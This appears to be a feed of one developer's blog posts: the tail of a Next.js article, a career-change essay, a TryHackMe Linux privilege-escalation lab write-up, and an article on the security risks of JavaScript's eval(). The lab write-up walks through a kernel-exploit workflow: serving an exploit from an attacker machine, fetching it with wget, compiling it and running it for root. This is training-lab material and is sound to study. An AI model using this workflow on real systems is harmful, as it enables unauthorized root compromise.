apps that are both fast and dynamic.</p> <p>By following the patterns and examples here—like passing server components into client components and combining them thoughtfully—you’ll be able to leverage the full power of Next.js 13 to create highly performant, interactive web applications.</p> <p>Happy coding<br> I am Michael.</p> webdev javascript nextjs programming How breaking into Tech @40 changed my life Michael Oladele Sat, 24 Aug 2024 06:09:07 +0000 https://forem.com/micheaol/how-breaking-into-tech-40-changed-my-life-4ea7 https://forem.com/micheaol/how-breaking-into-tech-40-changed-my-life-4ea7 <blockquote> <p>My Personal journey into tech</p> </blockquote> <p>Breaking into tech at age 40 might sound like a daunting challenge, especially when it requires leaving behind a secure, well-paying job. For me, however, it was a journey that redefined my life, my career, and my understanding of what it means to follow a passion.</p> <p><strong>The Cyber Café Days</strong><br> It all started in the most unlikely of places, cyber cafés. Back then, these were the hubs of curiosity and learning for many of us. I would spend countless hours in these cramped, dimly lit rooms, where the sound of keyboards clacking and the hum of outdated computers created an atmosphere that was oddly motivating. My friends would often ask me what I was doing, and my answer was always the same: I was feeding my curiosity about technology.</p> <p>I was intrigued by technology, its vast potential and the way it was rapidly changing the world. I scoured the internet for tutorials, articles, and any resource I could find on coding, software development, and IT in general. The more I learned, the more my passion grew, and so did my desire to transition into the tech industry. But it wasn't an easy road.</p> <p><strong>The Four-Year Struggle</strong><br> In the year 2016, I realised I needed to live a more purposeful life, and the only answer was for me to break into tech space.<br> For over Four years, I juggled my full-time job with late-night study sessions. My days were spent in the office, and my nights were dedicated to learning how to code, understanding the basics of computer science, and familiarising myself with the latest tech trends. It was exhausting, but the idea of one day working in tech kept me going.</p> <p>Despite the long hours and the steep learning curve, I never lost sight of my goal. There were times when I felt overwhelmed, especially when I struggled to grasp complex concepts. Yet, every small victory like finally debugging a stubborn piece of code or creating a simple web page fuelled my determination.</p> <p>Eventually, the pieces started falling into place. I began to see how my years of dedication and countless hours in cyber cafés were paying off. But there was still one more major decision to make, a decision that would challenge everything I knew about security and success.</p> <p><strong>Leaving It All Behind</strong><br> I was working in a stable, well paying job at the time. It was the kind of position most people dream of, offering financial security. But I knew that if I wanted to make a real leap into tech, I needed to give it my all. So, after much contemplation, I did the unthinkable, I resigned.</p> <p>When I announced my decision, the reactions were mixed. Friends, colleagues, and even family members were shocked. They couldn’t understand why I would leave such a lucrative job to pursue a career in a field where I had no formal experience. I was called reckless, and some even suggested that I was going through a midlife crisis. To be honest, there were moments when I doubted myself too. But deep down, I knew that this was what I wanted.</p> <p><strong>The Payoff</strong><br> Breaking into tech wasn’t immediate. The first few months were tough, filled with uncertainty and the challenge of proving myself in an industry that’s often seen as a young person’s game. But slowly, opportunities started to come my way. I landed my first part-time job as a code reviewer at Microverse, the coding bootcamp I learnt how to code, before I eventually secured a full-time position in a tech start-up as full-stack developer and now co-founded tech start-ups.</p> <p>The transition wasn’t just about switching careers; it was about rediscovering myself. Tech allowed me to be creative, solve problems, and work in an environment that was constantly evolving. Every day brought new challenges, but it also brought new opportunities to learn and grow. And for the first time in years, I felt truly fulfilled.</p> <p><strong>Reflections</strong><br> Looking back, breaking into tech at 40 was one of the most significant decisions I’ve ever made. It taught me that it’s never too late to pursue your passion, that age is just a number when it comes to learning, and that sometimes, you have to take risks to achieve the life you want.</p> <p>Yes, it was scary to leave behind a secure job and step into the unknown. But the rewards, both personal and professional have been worth every moment of uncertainty. Today, I’m not just a tech professional; I’m someone who followed their passion, defied the odds, and proved that it’s never too late to start over.</p> <p>To anyone out there who’s considering a similar leap, remember this: your dreams are valid, no matter how old you are or where you’re starting from. And sometimes, the craziest decisions turn out to be the best ones.</p> <p>If I can, you can too.</p> Try Hack Me: Linux PrivEsc Complete Steps Michael Oladele Sun, 30 Jun 2024 20:11:31 +0000 https://forem.com/micheaol/try-hack-me-linux-privesc-complete-steps-1kp4 https://forem.com/micheaol/try-hack-me-linux-privesc-complete-steps-1kp4 <p>Completing the TryHackMe <a href="https://tryhackme.com/r/room/linprivesc">Linux Privilege Escalation</a> labs on the Jr Penetration Tester path has been challenging to me. I thought I needed to write about it. Let's get started!</p> <p>I will skip some of the informational part and jump straight to task 5.</p> <h3> Task 1: Introduction </h3> <h3> Task 2: What is Privilege Escalation? </h3> <h3> Task 3: Enumeration </h3> <p>It does not matter how you gain the initial foothold, When you land on your target machine the first thing you want to do is Enumeration.</p> <p>To get the full enumeration steps, head over to TryHackMe <a href="https://tryhackme.com/r/room/linprivesc">Linux Privilege Escalation</a> labs</p> <p>Now let's dive into the main reason for this article:</p> <h3> Task 5: Privilege Escalation: Kernel Exploits: </h3> <p>This task expects that we escalate our privilege via kernel exploit.</p> <h4> Steps: </h4> <ol> <li>Get a foothold into the target system, in this case, we SSH into the target machine from our attack machine with the details provided</li> <li>We are to escalate through kernel exploit, we need to get the kernel of the machine by running the code below:</li> </ol> <p><code>uname -a</code></p> <p><a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fommzuob1e73ygllrxe5d.png" class="article-body-image-wrapper"><img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fommzuob1e73ygllrxe5d.png" alt="Image description" width="800" height="35"></a></p> <ol> <li>Now we have the kernel name, we need to search exploit DB for exploit to use against the victim machine kernel. We are in luck, we found an exploit on exploit DB. In most cases we might have to dig a little more on the internet.</li> </ol> <p><a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnyqx8g5yhvnirqtejvmr.png" class="article-body-image-wrapper"><img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnyqx8g5yhvnirqtejvmr.png" alt="Image description" width="800" height="337"></a></p> <ol> <li>Click Download to download the exploit to your attacker machine</li> </ol> <p><a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frsvhmd5beljwsh09n577.png" class="article-body-image-wrapper"><img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frsvhmd5beljwsh09n577.png" alt="Image description" width="800" height="89"></a></p> <ol> <li>The next step is to find a way to get the exploit code to the victim machine. I will be doing this with python3 http server.</li> <li>On the attacker's machine, run the code below in the same <code>dir</code> you have the file hosted run on port 8080.</li> </ol> <p><code>python3 -m http.server 8080</code></p> <ol> <li>Once your server is running on the attacker's machine, on the victim's machine, you will need to get the file with <code>wget</code>. Run the command below on the victim's machine:</li> </ol> <p><code>wget http://&lt;attacker's_IP: &lt;Port&gt;/&lt;file_name&gt;</code></p> <p><a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1btj8fv33rnjnvqfu98f.png" class="article-body-image-wrapper"><img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1btj8fv33rnjnvqfu98f.png" alt="Image description" width="800" height="126"></a></p> <p>If we check the <code>dir</code> with <code>ls</code> I can see the downloaded file in the <code>dir</code>. On the victim's machine.</p> <ol> <li>After the download, run the command below to compile the <code>C</code> file on the victim's machine.</li> </ol> <p><code>gcc &lt;filename.c&gt; -o &lt;name_want_to_call_the_compiled_file&gt; -w</code></p> <ol> <li>Then you need to give <code>writable permission</code> to the compiled file.</li> </ol> <p>If successful, you should see the file name in the <code>dir</code>, then run <code>id</code> to see current user id:</p> <p><a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw4mv63bbc9v2mu5v7np1.png" class="article-body-image-wrapper"><img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw4mv63bbc9v2mu5v7np1.png" alt="Image description" width="800" height="44"></a></p> <p>You can see that we have the regular user at the moment:</p> <ol> <li>Then run the exploit code:</li> </ol> <p><a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fv14u6qe7gl879qmyqsvl.png" class="article-body-image-wrapper"><img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fv14u6qe7gl879qmyqsvl.png" alt="Image description" width="800" height="44"></a></p> <p>Now we are root after we run the exploit code:</p> <p><a href="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7zwpfio6c05l3srw8zdp.png" class="article-body-image-wrapper"><img src="https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7zwpfio6c05l3srw8zdp.png" alt="Image description" width="800" height="149"></a></p> <h2> Conclusion </h2> <p>This is the end of the first part of this series. Watch out for</p> <h3> Tasks 6 - 12. </h3> <p>I hope this helped someone as this lab really challenged me, but it was so much fun and it felt good to complete it. Anyways, I got through it and now, so have you! </p> <p>It's Michael</p> tryhack ctf cybersecurity The Evil of the eval() Function in JavaScript Michael Oladele Sat, 09 Mar 2024 10:53:43 +0000 https://forem.com/micheaol/the-evil-of-the-eval-function-in-javascript-ll5 https://forem.com/micheaol/the-evil-of-the-eval-function-in-javascript-ll5 <blockquote> <p>While the eval() function in JavaScript can be a powerful tool for dynamically executing code, it introduces significant security risks if used improperly</p> </blockquote> <p>JavaScript is a versatile programming language no doubt, that powers a significant portion of the web. It provides developers with powerful tools to manipulate and execute code dynamically. One such tool is the eval() function, which evaluates a string of code as though it were part of the script. While eval() can be useful in certain situations, it also poses significant security risks if not used carefully. In this article, we'll explore the potential dangers of using eval() and discuss best practices for mitigating these risks.</p> <p>Before diving into the risks of using the function eval() we need to understanding eval().<br> The eval() function in JavaScript takes a string argument and evaluates it as JavaScript code. This means that any valid JavaScript code can be passed to eval(), and it will be executed within the current execution context. For example:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>var x = 10; var y = 20; var result = eval("x + y"); // result will be 30 </code></pre> </div> <p>While eval() can be convenient for dynamically generating and executing code, it introduces security vulnerabilities that can be exploited by malicious actors.</p> <p>Security Risks<br> Injection Attacks: One of the most significant risks of using eval() is the potential for injection attacks. If the string passed to eval() contains user input, an attacker could craft a malicious string to execute arbitrary code on the client-side. For example:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>var userInput = "alert('You have been hacked!')"; eval(userInput); // executes the alert </code></pre> </div> <p>In this scenario, the attacker could inject any JavaScript code, potentially compromising sensitive user data or performing unauthorized actions.</p> <p>This article focuses on the security risks of using eval() in your application:</p> <p>Cross-site Scripting (XSS): eval() can also be exploited in XSS attacks, where an attacker injects malicious scripts into web pages viewed by other users. If user input is not properly sanitized before being passed to eval(), it can lead to the execution of malicious code on unsuspecting users' browsers.</p> <p>Best Practices for Mitigation<br> To mitigate the security risks associated with eval(), consider the following best practices:</p> <p>Avoid eval() Whenever Possible: In most cases, there are alternative methods for achieving the desired functionality without resorting to eval(). Consider using built-in JavaScript functions like JSON.parse() or Function() constructor instead.</p> <p>Sanitize User Input: If you must use eval() with user input, ensure that the input is properly sanitized and validated to prevent injection attacks. Never execute user input directly within eval() without validation.</p> <p>Use Strict Mode: Enable strict mode ("use strict";) in your JavaScript code to enforce stricter parsing and error handling, which can help catch potential issues with eval() usage.</p> <p>Code Reviews and Audits: Regularly review your codebase to identify and eliminate unnecessary uses of eval(). Conduct security audits to identify potential vulnerabilities and address them proactively.</p> <p>While the eval() function in JavaScript can be a powerful tool for dynamically executing code, it introduces significant security risks if used improperly. By understanding these risks and following best practices for mitigation, developers can minimize the likelihood of exploitation and protect their applications from malicious attacks. Remember to prioritize security in your codebase and exercise caution when using eval() in your JavaScript projects.</p> <p>Michael Oladele</p>